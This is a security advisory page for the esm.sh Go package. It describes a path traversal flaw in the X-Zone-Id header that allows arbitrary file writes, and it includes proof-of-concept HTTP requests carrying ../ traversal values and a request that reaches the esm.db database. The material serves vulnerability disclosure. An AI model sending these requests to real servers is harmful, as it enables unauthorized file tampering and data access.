GHSA-g2h5-cvvr-7gmw

Suggest an improvement
Source
https://github.com/advisories/GHSA-g2h5-cvvr-7gmw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-g2h5-cvvr-7gmw/GHSA-g2h5-cvvr-7gmw.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-g2h5-cvvr-7gmw
Aliases
Published
2025-09-17T19:03:05Z
Modified
2025-09-26T16:14:54Z
Severity
  • 5.5 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header
Details

Summary

A path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories (example observed: ~/.esmd/modules/transform/<id>/ instead of ~/.esmd/storage/modules/transform).

Severity: Medium

Component / Endpoint:

POST /transform — handling of X-Zone-Id header

The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411

Impact: Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.

Proof of Concept (POC)

Request (attacker-supplied X-Zone-Id contains path traversal):

POST /transform HTTP/1.1
Host: localhost:8888
User-Agent: Den/8.7.1
Accept: */*
Connection: keep-alive
Referer: http://localhost:9999/
Content-Type: application/json
X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/
Content-Length: 325

{
  "filename": "example2.js",
  "lang": "js",
  "code": "console.log('hello');",
  "importMap": {
    "imports": {
      "react": "https://esm.sh/react",
      "react-dom": "https://esm.sh/react-dom"
    }
  },
  "jsxImportSource": "react",
  "target": "es2022",
  "sourceMap": "external",
  "minify": true
}

<img width="2496" height="1214" alt="Screenshot 2025-09-16 at 21 40 57" src="https://github.com/user-attachments/assets/f878c3f0-5d7d-410c-97ac-20116f5496db" />

Observed result: file written to ~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js instead of the intended ~/.esmd/storage/modules/transform/.

This can be trigger with another path traversal request below

GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1
Host: localhost:8888
User-Agent: localhost
Accept: */*
Connection: keep-alive
X-Zone-Id: ../
Referer: http://localhost:9999/

<img width="2516" height="710" alt="Screenshot 2025-09-16 at 21 37 07" src="https://github.com/user-attachments/assets/1fcfbed3-c1d2-4093-82d8-4afda225c685" />

Remediation

Simply remove any .. in the X-Zone-Id header before actually process the file.

Credits

Database specific 
{
    "github_reviewed_at": "2025-09-17T19:03:05Z",
    "cwe_ids": [
        "CWE-24"
    ],
    "nvd_published_at": "2025-09-17T18:15:53Z",
    "severity": "MODERATE",
    "github_reviewed": true
}
References

Affected packages

Go / github.com/esm-dev/esm.sh

Package

Name
github.com/esm-dev/esm.sh
View open source insights on deps.dev
Purl
pkg:golang/github.com/esm-dev/esm.sh

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
136